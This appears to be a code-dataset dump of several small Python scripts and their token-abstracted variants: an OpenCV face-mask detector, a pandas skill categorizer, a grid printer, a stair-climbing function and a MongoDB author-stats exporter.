"<import token>\nmodel = load_model('trainedmodel.h5')\nprint(' Enter a option ')\nprint(' 1. Detect Mask using image')\nprint(' 2. Detect Mask using live video')\na = input('Press 1 / 2 : ')\nif a == 2:\n img_width, img_hight = 224, 224\n direc = 'faces'\n a = 511\n img_width, img_hight = 200, 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n cap = cv2.VideoCapture(0)\n img_count_full = 0\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n while True:\n os.mkdir(direc, a)\n img_count_full += 1\n responce, color_img = cap.read()\n if responce == False:\n break\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, 1.2, 3)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('faces/%d%dface.jpg' % (img_count_full, img_count),\n color_face)\n img = load_img('faces/%d%dface.jpg' % (img_count_full,\n img_count), target_size=(img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 0, 255, 0\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 0, 255\n cv2.rectangle(color_img, (x, y), (x + w, y + h), color, 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imshow('LIVE face mask detection', color_img)\n shutil.rmtree(direc)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\nelse:\n img_width = 200\n img_hight = 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n color_img = cv2.imread('B612_20170324_142650.jpg')\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, scaleFactor=1.2,\n minNeighbors=5, flags=cv2.CASCADE_SCALE_IMAGE)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('imgfaces/%dface.jpg' % img_count, color_face)\n img = load_img('imgfaces/%dface.jpg' % img_count, target_size=(\n img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 255, 0, 0\n cv2.imwrite('faces/with_mask/%dface.jpg' % img_count, color_face)\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dmask.jpg' % img_count, color_img)\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 255, 0\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dno_mask.jpg' % img_count, color_img)\n dim = 600, 600\n resized = cv2.resize(color_img, dim, interpolation=cv2.INTER_AREA)\n cv2.imshow('LIVE face mask detection', resized)\n cv2.waitKey()\n cv2.destroyAllWindows()\ninput('Press ENTER to exit')\n",
"<import token>\n<assignment token>\nprint(' Enter a option ')\nprint(' 1. Detect Mask using image')\nprint(' 2. Detect Mask using live video')\n<assignment token>\nif a == 2:\n img_width, img_hight = 224, 224\n direc = 'faces'\n a = 511\n img_width, img_hight = 200, 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n cap = cv2.VideoCapture(0)\n img_count_full = 0\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n while True:\n os.mkdir(direc, a)\n img_count_full += 1\n responce, color_img = cap.read()\n if responce == False:\n break\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, 1.2, 3)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('faces/%d%dface.jpg' % (img_count_full, img_count),\n color_face)\n img = load_img('faces/%d%dface.jpg' % (img_count_full,\n img_count), target_size=(img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 0, 255, 0\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 0, 255\n cv2.rectangle(color_img, (x, y), (x + w, y + h), color, 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imshow('LIVE face mask detection', color_img)\n shutil.rmtree(direc)\n if cv2.waitKey(1) & 255 == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\nelse:\n img_width = 200\n img_hight = 200\n face_cascade = cv2.CascadeClassifier(cv2.data.haarcascades +\n 'haarcascade_frontalface_default.xml')\n font = cv2.FONT_HERSHEY_SIMPLEX\n org = 1, 1\n class_lable = ' '\n fontScale = 1\n color = 255, 0, 0\n thickness = 2\n color_img = cv2.imread('B612_20170324_142650.jpg')\n gray_img = cv2.cvtColor(color_img, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray_img, scaleFactor=1.2,\n minNeighbors=5, flags=cv2.CASCADE_SCALE_IMAGE)\n img_count = 0\n for x, y, w, h in faces:\n org = x - 10, y - 10\n img_count += 1\n color_face = color_img[y:y + h, x:x + w]\n cv2.imwrite('imgfaces/%dface.jpg' % img_count, color_face)\n img = load_img('imgfaces/%dface.jpg' % img_count, target_size=(\n img_width, img_hight))\n img = img_to_array(img) / 255\n img = np.expand_dims(img, axis=0)\n pred_prob = model.predict(img)\n pred = np.argmax(pred_prob)\n if pred == 0:\n print('User with mask - predic = ', pred_prob[0][0])\n class_lable = 'Mask'\n color = 255, 0, 0\n cv2.imwrite('faces/with_mask/%dface.jpg' % img_count, color_face)\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dmask.jpg' % img_count, color_img)\n else:\n print('user not wearing mask - prob = ', pred_prob[0][1])\n class_lable = 'No Mask'\n color = 0, 255, 0\n cv2.rectangle(color_img, (x, y), (x + w, y + h), (0, 0, 255), 3)\n cv2.putText(color_img, class_lable, org, font, fontScale, color,\n thickness, cv2.LINE_AA)\n cv2.imwrite('faces/with_mask/%dno_mask.jpg' % img_count, color_img)\n dim = 600, 600\n resized = cv2.resize(color_img, dim, interpolation=cv2.INTER_AREA)\n cv2.imshow('LIVE face mask detection', resized)\n cv2.waitKey()\n cv2.destroyAllWindows()\ninput('Press ENTER to exit')\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,802 | 3ae9d2c3b414054973c3a884a71b4ab2e73911d9 | import pandas as pd
import dataframe
data = pd.read_csv(r'D:\Academic\Level 4 - Semester 1\Research Project\Categorized Data\Skills\Book11.csv', names=['category'])
df = pd.DataFrame(data)
a = ['software', 'developer', 'programmer', 'Programming', 'Hibernate', 'Web', 'Mobile', 'Android', 'iOS', 'Agile', 'OOP', 'JS', 'Design Patterns', 'Technical Lead', 'Tech Lead', 'Support Engineer', 'Enterprise Application Development', 'Maven', 'SDLC']
b = ['QA', 'Tester', 'Quality', 'Automation', 'Selenium', 'Testing', 'Test']
e = ['Business', 'Functional Analyst', ' Solution', 'System Analyst', 'Requirements Analysis']
f = ['Networking', 'Switches', 'Cisco Packet Tracer', 'Wireless', 'Network', 'TCP', 'LAN-WAN']
i = ['Manager', 'owner', 'Management', 'Director', 'Strategy']
j = ['PHD', 'MSC', 'postgraduate', 'Research']
l = ['Lecturer', 'tutor', 'Instructor', 'Demonstrator']
m = ['Database', 'MySQL', 'Oracle', 'SQL', 'Apache', ' MongoDB ']
n = ['Data Science', 'Machine Learning', 'Data Scientist', 'Data Analysis', 'Statistics', 'Data Mining']
p = ['Computer Science', 'Computer Engineering', 'Systems Engineer', 'System Administrator', 'System Administration']
q = ['Information Technology', 'ICT']
r = ['Computer Architecture']
s = ['Distributed System', 'Cluster Computing']
t = ['Cloud Computing']
u = ['Algorithms', 'Data Structures']
w = ['JAVA', 'Python', 'HTML', '.NET', 'Ruby', 'COBOL', 'XML', ' jQuery', 'Bootstrap', 'PHP', 'Cascading Style Sheets']
x = ['Mathematics', 'Physical Science', 'physics']
y = ['Operating Systems', 'Windows', 'Ubuntu', 'Linux', 'Unix']
za = ['Multimedia', 'Animation', 'Graphic', 'Digital Media']
ab = ['Cyber', 'Information Security']
ac = ['Information System']
ad = ['Artificial Intelligence', 'Deep Learning', 'Computer Vision', 'Robotics', 'Natural Language']
ae = ['Bioinformatics', 'Biology', 'Biomedical']
af = ['Telecommunication', 'Communication']
ag = ['Computer Hardware', 'Embedded System', 'Microcontrollers ', 'Electronic', 'Internet of Things', 'Arduino', 'PCB Design']
ah = ['Marketing', 'E-Commerce', 'Banking', 'Finance', 'Account', 'Customer', 'Sales', 'Pricing', 'Markets']
aj = ['E-Governance', 'Legal', 'Law']
ak = ['Geography', 'Geographic', 'GIS', 'Geoinformatics']
al = ['Human Computer Interaction', 'User Interface', 'User Experience', 'UI/UX']
ao = ['Big Data', 'Hadoop']
g = 'Software Engineering'
z = 'Quality Assurance'
ee = 'Business Analysis'
ff = 'Networking'
ii = 'Management'
jj = 'Research'
ll = 'Lecturing'
mm = 'Database'
nn = 'Data Science'
pp = 'Computer Science'
qq = 'Information Technology'
rr = 'Computer Architecture'
ss = 'Distributed System'
tt = 'Cloud Computing'
uu = 'Data Structures and Algorithms'
ww = 'Programming Languages'
xx = 'Mathematics'
yy = 'Operating Systems'
zz = 'Multimedia, Animation and Graphic Design'
abb = 'Cyber Security'
acc = 'Information System'
add = 'Artificial Intelligence'
aee = 'Bio-informatics'
aff = 'Telecommunication'
agg = 'Embedded System'
ahh = 'Marketing and E-Commerce'
ajj = 'E-Governance'
akk = 'GIS'
all = 'HCI'
aoo = 'Big Data'
c='Other'
d = {g:a, z:b, ee:e, ff:f, ii:i, jj:j, ll:l, mm:m, nn:n, pp:p, zz:za, qq:q, rr:r, ss:s, tt:t, uu:u, ww:w, xx:x, yy:y, abb:ab, acc:ac, add:ad, aee:ae,aff:af, agg:ag, ahh:ah, akk:ak, all:al, aoo:ao}
df['new_category'] = c
for k, v in d.items():
pat = '|'.join(v)
mask = df.category.str.contains(pat, case=False)
df.loc[mask, 'new_category'] = k
df.to_csv(r'D:\Academic\Level 4 - Semester 1\Research Project\Categorized Data\Skill8.csv', index=False)
| [
"import pandas as pd\nimport dataframe\n\ndata = pd.read_csv(r'D:\\Academic\\Level 4 - Semester 1\\Research Project\\Categorized Data\\Skills\\Book11.csv', names=['category'])\n\ndf = pd.DataFrame(data)\n\na = ['software', 'developer', 'programmer', 'Programming', 'Hibernate', 'Web', 'Mobile', 'Android', 'iOS', 'Agile', 'OOP', 'JS', 'Design Patterns', 'Technical Lead', 'Tech Lead', 'Support Engineer', 'Enterprise Application Development', 'Maven', 'SDLC']\nb = ['QA', 'Tester', 'Quality', 'Automation', 'Selenium', 'Testing', 'Test']\ne = ['Business', 'Functional Analyst', ' Solution', 'System Analyst', 'Requirements Analysis']\nf = ['Networking', 'Switches', 'Cisco Packet Tracer', 'Wireless', 'Network', 'TCP', 'LAN-WAN']\ni = ['Manager', 'owner', 'Management', 'Director', 'Strategy']\nj = ['PHD', 'MSC', 'postgraduate', 'Research']\nl = ['Lecturer', 'tutor', 'Instructor', 'Demonstrator']\nm = ['Database', 'MySQL', 'Oracle', 'SQL', 'Apache', ' MongoDB ']\nn = ['Data Science', 'Machine Learning', 'Data Scientist', 'Data Analysis', 'Statistics', 'Data Mining']\np = ['Computer Science', 'Computer Engineering', 'Systems Engineer', 'System Administrator', 'System Administration']\nq = ['Information Technology', 'ICT']\nr = ['Computer Architecture']\ns = ['Distributed System', 'Cluster Computing']\nt = ['Cloud Computing']\nu = ['Algorithms', 'Data Structures']\nw = ['JAVA', 'Python', 'HTML', '.NET', 'Ruby', 'COBOL', 'XML', ' jQuery', 'Bootstrap', 'PHP', 'Cascading Style Sheets']\nx = ['Mathematics', 'Physical Science', 'physics']\ny = ['Operating Systems', 'Windows', 'Ubuntu', 'Linux', 'Unix']\nza = ['Multimedia', 'Animation', 'Graphic', 'Digital Media']\nab = ['Cyber', 'Information Security']\nac = ['Information System']\nad = ['Artificial Intelligence', 'Deep Learning', 'Computer Vision', 'Robotics', 'Natural Language']\nae = ['Bioinformatics', 'Biology', 'Biomedical']\naf = ['Telecommunication', 'Communication']\nag = ['Computer Hardware', 'Embedded System', 'Microcontrollers ', 'Electronic', 'Internet of Things', 'Arduino', 'PCB Design']\nah = ['Marketing', 'E-Commerce', 'Banking', 'Finance', 'Account', 'Customer', 'Sales', 'Pricing', 'Markets']\naj = ['E-Governance', 'Legal', 'Law']\nak = ['Geography', 'Geographic', 'GIS', 'Geoinformatics']\nal = ['Human Computer Interaction', 'User Interface', 'User Experience', 'UI/UX']\nao = ['Big Data', 'Hadoop']\n\n\ng = 'Software Engineering'\nz = 'Quality Assurance'\nee = 'Business Analysis'\nff = 'Networking'\nii = 'Management'\njj = 'Research'\nll = 'Lecturing'\nmm = 'Database'\nnn = 'Data Science'\npp = 'Computer Science'\nqq = 'Information Technology'\nrr = 'Computer Architecture'\nss = 'Distributed System'\ntt = 'Cloud Computing'\nuu = 'Data Structures and Algorithms'\nww = 'Programming Languages'\nxx = 'Mathematics'\nyy = 'Operating Systems'\nzz = 'Multimedia, Animation and Graphic Design'\nabb = 'Cyber Security'\nacc = 'Information System'\nadd = 'Artificial Intelligence'\naee = 'Bio-informatics'\naff = 'Telecommunication'\nagg = 'Embedded System'\nahh = 'Marketing and E-Commerce'\najj = 'E-Governance'\nakk = 'GIS'\nall = 'HCI'\naoo = 'Big Data'\n\n\nc='Other'\n\nd = {g:a, z:b, ee:e, ff:f, ii:i, jj:j, ll:l, mm:m, nn:n, pp:p, zz:za, qq:q, rr:r, ss:s, tt:t, uu:u, ww:w, xx:x, yy:y, abb:ab, acc:ac, add:ad, aee:ae,aff:af, agg:ag, ahh:ah, akk:ak, all:al, aoo:ao}\n\ndf['new_category'] = c\n\nfor k, v in d.items():\n pat = '|'.join(v)\n mask = df.category.str.contains(pat, case=False)\n\n df.loc[mask, 'new_category'] = k\n\n\ndf.to_csv(r'D:\\Academic\\Level 4 - Semester 1\\Research Project\\Categorized Data\\Skill8.csv', index=False)\n",
"import pandas as pd\nimport dataframe\ndata = pd.read_csv(\n 'D:\\\\Academic\\\\Level 4 - Semester 1\\\\Research Project\\\\Categorized Data\\\\Skills\\\\Book11.csv'\n , names=['category'])\ndf = pd.DataFrame(data)\na = ['software', 'developer', 'programmer', 'Programming', 'Hibernate',\n 'Web', 'Mobile', 'Android', 'iOS', 'Agile', 'OOP', 'JS',\n 'Design Patterns', 'Technical Lead', 'Tech Lead', 'Support Engineer',\n 'Enterprise Application Development', 'Maven', 'SDLC']\nb = ['QA', 'Tester', 'Quality', 'Automation', 'Selenium', 'Testing', 'Test']\ne = ['Business', 'Functional Analyst', ' Solution', 'System Analyst',\n 'Requirements Analysis']\nf = ['Networking', 'Switches', 'Cisco Packet Tracer', 'Wireless', 'Network',\n 'TCP', 'LAN-WAN']\ni = ['Manager', 'owner', 'Management', 'Director', 'Strategy']\nj = ['PHD', 'MSC', 'postgraduate', 'Research']\nl = ['Lecturer', 'tutor', 'Instructor', 'Demonstrator']\nm = ['Database', 'MySQL', 'Oracle', 'SQL', 'Apache', ' MongoDB ']\nn = ['Data Science', 'Machine Learning', 'Data Scientist', 'Data Analysis',\n 'Statistics', 'Data Mining']\np = ['Computer Science', 'Computer Engineering', 'Systems Engineer',\n 'System Administrator', 'System Administration']\nq = ['Information Technology', 'ICT']\nr = ['Computer Architecture']\ns = ['Distributed System', 'Cluster Computing']\nt = ['Cloud Computing']\nu = ['Algorithms', 'Data Structures']\nw = ['JAVA', 'Python', 'HTML', '.NET', 'Ruby', 'COBOL', 'XML', ' jQuery',\n 'Bootstrap', 'PHP', 'Cascading Style Sheets']\nx = ['Mathematics', 'Physical Science', 'physics']\ny = ['Operating Systems', 'Windows', 'Ubuntu', 'Linux', 'Unix']\nza = ['Multimedia', 'Animation', 'Graphic', 'Digital Media']\nab = ['Cyber', 'Information Security']\nac = ['Information System']\nad = ['Artificial Intelligence', 'Deep Learning', 'Computer Vision',\n 'Robotics', 'Natural Language']\nae = ['Bioinformatics', 'Biology', 'Biomedical']\naf = ['Telecommunication', 'Communication']\nag = ['Computer Hardware', 'Embedded System', 'Microcontrollers ',\n 'Electronic', 'Internet of Things', 'Arduino', 'PCB Design']\nah = ['Marketing', 'E-Commerce', 'Banking', 'Finance', 'Account',\n 'Customer', 'Sales', 'Pricing', 'Markets']\naj = ['E-Governance', 'Legal', 'Law']\nak = ['Geography', 'Geographic', 'GIS', 'Geoinformatics']\nal = ['Human Computer Interaction', 'User Interface', 'User Experience',\n 'UI/UX']\nao = ['Big Data', 'Hadoop']\ng = 'Software Engineering'\nz = 'Quality Assurance'\nee = 'Business Analysis'\nff = 'Networking'\nii = 'Management'\njj = 'Research'\nll = 'Lecturing'\nmm = 'Database'\nnn = 'Data Science'\npp = 'Computer Science'\nqq = 'Information Technology'\nrr = 'Computer Architecture'\nss = 'Distributed System'\ntt = 'Cloud Computing'\nuu = 'Data Structures and Algorithms'\nww = 'Programming Languages'\nxx = 'Mathematics'\nyy = 'Operating Systems'\nzz = 'Multimedia, Animation and Graphic Design'\nabb = 'Cyber Security'\nacc = 'Information System'\nadd = 'Artificial Intelligence'\naee = 'Bio-informatics'\naff = 'Telecommunication'\nagg = 'Embedded System'\nahh = 'Marketing and E-Commerce'\najj = 'E-Governance'\nakk = 'GIS'\nall = 'HCI'\naoo = 'Big Data'\nc = 'Other'\nd = {g: a, z: b, ee: e, ff: f, ii: i, jj: j, ll: l, mm: m, nn: n, pp: p, zz:\n za, qq: q, rr: r, ss: s, tt: t, uu: u, ww: w, xx: x, yy: y, abb: ab,\n acc: ac, add: ad, aee: ae, aff: af, agg: ag, ahh: ah, akk: ak, all: al,\n aoo: ao}\ndf['new_category'] = c\nfor k, v in d.items():\n pat = '|'.join(v)\n mask = df.category.str.contains(pat, case=False)\n df.loc[mask, 'new_category'] = k\ndf.to_csv(\n 'D:\\\\Academic\\\\Level 4 - Semester 1\\\\Research Project\\\\Categorized Data\\\\Skill8.csv'\n , index=False)\n",
"<import token>\ndata = pd.read_csv(\n 'D:\\\\Academic\\\\Level 4 - Semester 1\\\\Research Project\\\\Categorized Data\\\\Skills\\\\Book11.csv'\n , names=['category'])\ndf = pd.DataFrame(data)\na = ['software', 'developer', 'programmer', 'Programming', 'Hibernate',\n 'Web', 'Mobile', 'Android', 'iOS', 'Agile', 'OOP', 'JS',\n 'Design Patterns', 'Technical Lead', 'Tech Lead', 'Support Engineer',\n 'Enterprise Application Development', 'Maven', 'SDLC']\nb = ['QA', 'Tester', 'Quality', 'Automation', 'Selenium', 'Testing', 'Test']\ne = ['Business', 'Functional Analyst', ' Solution', 'System Analyst',\n 'Requirements Analysis']\nf = ['Networking', 'Switches', 'Cisco Packet Tracer', 'Wireless', 'Network',\n 'TCP', 'LAN-WAN']\ni = ['Manager', 'owner', 'Management', 'Director', 'Strategy']\nj = ['PHD', 'MSC', 'postgraduate', 'Research']\nl = ['Lecturer', 'tutor', 'Instructor', 'Demonstrator']\nm = ['Database', 'MySQL', 'Oracle', 'SQL', 'Apache', ' MongoDB ']\nn = ['Data Science', 'Machine Learning', 'Data Scientist', 'Data Analysis',\n 'Statistics', 'Data Mining']\np = ['Computer Science', 'Computer Engineering', 'Systems Engineer',\n 'System Administrator', 'System Administration']\nq = ['Information Technology', 'ICT']\nr = ['Computer Architecture']\ns = ['Distributed System', 'Cluster Computing']\nt = ['Cloud Computing']\nu = ['Algorithms', 'Data Structures']\nw = ['JAVA', 'Python', 'HTML', '.NET', 'Ruby', 'COBOL', 'XML', ' jQuery',\n 'Bootstrap', 'PHP', 'Cascading Style Sheets']\nx = ['Mathematics', 'Physical Science', 'physics']\ny = ['Operating Systems', 'Windows', 'Ubuntu', 'Linux', 'Unix']\nza = ['Multimedia', 'Animation', 'Graphic', 'Digital Media']\nab = ['Cyber', 'Information Security']\nac = ['Information System']\nad = ['Artificial Intelligence', 'Deep Learning', 'Computer Vision',\n 'Robotics', 'Natural Language']\nae = ['Bioinformatics', 'Biology', 'Biomedical']\naf = ['Telecommunication', 'Communication']\nag = ['Computer Hardware', 'Embedded System', 'Microcontrollers ',\n 'Electronic', 'Internet of Things', 'Arduino', 'PCB Design']\nah = ['Marketing', 'E-Commerce', 'Banking', 'Finance', 'Account',\n 'Customer', 'Sales', 'Pricing', 'Markets']\naj = ['E-Governance', 'Legal', 'Law']\nak = ['Geography', 'Geographic', 'GIS', 'Geoinformatics']\nal = ['Human Computer Interaction', 'User Interface', 'User Experience',\n 'UI/UX']\nao = ['Big Data', 'Hadoop']\ng = 'Software Engineering'\nz = 'Quality Assurance'\nee = 'Business Analysis'\nff = 'Networking'\nii = 'Management'\njj = 'Research'\nll = 'Lecturing'\nmm = 'Database'\nnn = 'Data Science'\npp = 'Computer Science'\nqq = 'Information Technology'\nrr = 'Computer Architecture'\nss = 'Distributed System'\ntt = 'Cloud Computing'\nuu = 'Data Structures and Algorithms'\nww = 'Programming Languages'\nxx = 'Mathematics'\nyy = 'Operating Systems'\nzz = 'Multimedia, Animation and Graphic Design'\nabb = 'Cyber Security'\nacc = 'Information System'\nadd = 'Artificial Intelligence'\naee = 'Bio-informatics'\naff = 'Telecommunication'\nagg = 'Embedded System'\nahh = 'Marketing and E-Commerce'\najj = 'E-Governance'\nakk = 'GIS'\nall = 'HCI'\naoo = 'Big Data'\nc = 'Other'\nd = {g: a, z: b, ee: e, ff: f, ii: i, jj: j, ll: l, mm: m, nn: n, pp: p, zz:\n za, qq: q, rr: r, ss: s, tt: t, uu: u, ww: w, xx: x, yy: y, abb: ab,\n acc: ac, add: ad, aee: ae, aff: af, agg: ag, ahh: ah, akk: ak, all: al,\n aoo: ao}\ndf['new_category'] = c\nfor k, v in d.items():\n pat = '|'.join(v)\n mask = df.category.str.contains(pat, case=False)\n df.loc[mask, 'new_category'] = k\ndf.to_csv(\n 'D:\\\\Academic\\\\Level 4 - Semester 1\\\\Research Project\\\\Categorized Data\\\\Skill8.csv'\n , index=False)\n",
"<import token>\n<assignment token>\nfor k, v in d.items():\n pat = '|'.join(v)\n mask = df.category.str.contains(pat, case=False)\n df.loc[mask, 'new_category'] = k\ndf.to_csv(\n 'D:\\\\Academic\\\\Level 4 - Semester 1\\\\Research Project\\\\Categorized Data\\\\Skill8.csv'\n , index=False)\n",
"<import token>\n<assignment token>\n<code token>\n"
] | false |
99,803 | 0f6006529d03e74103155c3e8851b1ca3de6ca87 | #Character Picture Grid
#Copy the following grid value, and write code that uses it to print the image.
grid = [['.', '.', '.', '.', '.', '.'],
['.', 'O', 'O', '.', '.', '.'],
['O', 'O', 'O', 'O', '.', '.'],
['O', 'O', 'O', 'O', 'O', '.'],
['.', 'O', 'O', 'O', 'O', 'O'],
['O', 'O', 'O', 'O', 'O', '.'],
['O', 'O', 'O', 'O', '.', '.'],
['.', 'O', 'O', '.', '.', '.'],
['.', '.', '.', '.', '.', '.']] # 9 x 6
#print a 6 x 9 string
width = len(grid[0]) #6
height = len(grid) #9
for j in range(width):
for i in range(height-1):
print(grid[i][j],end = '')
print(grid[height-1][j])
| [
"#Character Picture Grid\r\n#Copy the following grid value, and write code that uses it to print the image.\r\ngrid = [['.', '.', '.', '.', '.', '.'],\r\n ['.', 'O', 'O', '.', '.', '.'],\r\n ['O', 'O', 'O', 'O', '.', '.'],\r\n ['O', 'O', 'O', 'O', 'O', '.'],\r\n ['.', 'O', 'O', 'O', 'O', 'O'],\r\n ['O', 'O', 'O', 'O', 'O', '.'],\r\n ['O', 'O', 'O', 'O', '.', '.'],\r\n ['.', 'O', 'O', '.', '.', '.'],\r\n ['.', '.', '.', '.', '.', '.']] # 9 x 6\r\n\r\n#print a 6 x 9 string\r\n\r\nwidth = len(grid[0]) #6\r\nheight = len(grid) #9\r\n\r\nfor j in range(width):\r\n for i in range(height-1):\r\n print(grid[i][j],end = '')\r\n print(grid[height-1][j])\r\n\r\n",
"grid = [['.', '.', '.', '.', '.', '.'], ['.', 'O', 'O', '.', '.', '.'], [\n 'O', 'O', 'O', 'O', '.', '.'], ['O', 'O', 'O', 'O', 'O', '.'], ['.',\n 'O', 'O', 'O', 'O', 'O'], ['O', 'O', 'O', 'O', 'O', '.'], ['O', 'O',\n 'O', 'O', '.', '.'], ['.', 'O', 'O', '.', '.', '.'], ['.', '.', '.',\n '.', '.', '.']]\nwidth = len(grid[0])\nheight = len(grid)\nfor j in range(width):\n for i in range(height - 1):\n print(grid[i][j], end='')\n print(grid[height - 1][j])\n",
"<assignment token>\nfor j in range(width):\n for i in range(height - 1):\n print(grid[i][j], end='')\n print(grid[height - 1][j])\n",
"<assignment token>\n<code token>\n"
] | false |
99,804 | 7a5df86755d25405959fa1c2a075354775a64110 | def number_of_ways_to_top(top, maximum_step):
if top == 0 :
return 1
dp = [0]*(top+1) #dp[i] = number off ways to climb up i stairs
dp[0] = 1
for i in range(1,top+1):
j = 1
while j <= i and j <= maximum_step :
dp[i]+=dp[i-j]
j+=1
return dp[top]
if __name__ == "__main__":
n, k = 4, 2
print(number_of_ways_to_top(n,k)) | [
"def number_of_ways_to_top(top, maximum_step):\n if top == 0 :\n return 1\n dp = [0]*(top+1) #dp[i] = number off ways to climb up i stairs\n dp[0] = 1\n for i in range(1,top+1):\n j = 1\n while j <= i and j <= maximum_step :\n dp[i]+=dp[i-j]\n j+=1\n return dp[top]\n\nif __name__ == \"__main__\":\n n, k = 4, 2\n print(number_of_ways_to_top(n,k))",
"def number_of_ways_to_top(top, maximum_step):\n if top == 0:\n return 1\n dp = [0] * (top + 1)\n dp[0] = 1\n for i in range(1, top + 1):\n j = 1\n while j <= i and j <= maximum_step:\n dp[i] += dp[i - j]\n j += 1\n return dp[top]\n\n\nif __name__ == '__main__':\n n, k = 4, 2\n print(number_of_ways_to_top(n, k))\n",
"def number_of_ways_to_top(top, maximum_step):\n if top == 0:\n return 1\n dp = [0] * (top + 1)\n dp[0] = 1\n for i in range(1, top + 1):\n j = 1\n while j <= i and j <= maximum_step:\n dp[i] += dp[i - j]\n j += 1\n return dp[top]\n\n\n<code token>\n",
"<function token>\n<code token>\n"
] | false |
99,805 | 7e5728ef15af5fa20c7269e1a4786fbeac70dec7 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
# Exports a CSV with top authors and their publications, to check a) disambiguation and b) h-index
__author__ = """Giovanni Colavizza"""
import codecs
# MongoDB
from pymongo import MongoClient
from configparser import ConfigParser
config_set = "localhost" # this is in localhost
config = ConfigParser(allow_no_value=False)
config.read("config/config.conf")
mongo_db = config.get(config_set, 'db-name')
mongo_user = config.get(config_set, 'username')
mongo_pwd = config.get(config_set, 'password')
mongo_auth = config.get(config_set, 'auth-db')
mongo_host = config.get(config_set, 'db-host')
mongo_port = config.get(config_set, 'db-port')
client = MongoClient(mongo_host)
db = client[mongo_db]
db.authenticate(mongo_user, mongo_pwd, source=mongo_auth)
collection = db.stats_dev
collection_authors = db.authors_dev
limit = 10
# get records
authors = list()
for record in collection_authors.find():
authors.append({"tot_cit":record["tot_cit"],"name":record["name"],"n_pub":len(record["publications"]),"publications":record["publications"],"h_index":record["h_index"]})
authors = sorted(authors,key=lambda x:x["n_pub"],reverse=True)
with codecs.open("exports/evaluation_authors.csv","w",encoding="utf8") as f:
f.write("id,name,h_index,tot_cit,publication_title,pub_year,n_cit\n")
for n,a in enumerate(authors[:limit]):
for p in a["publications"]:
title = p["title"].replace('"','')
title = title.replace('\n', ' ')
title = title.replace('\r', ' ')
f.write(str(n)+","+'"'+a["name"]+'"'+","+str(a["h_index"])+","+str(a["tot_cit"])+","+'"'+title+'"'+","+str(p["year"])+","+str(p["n_cit"])+"\n")
| [
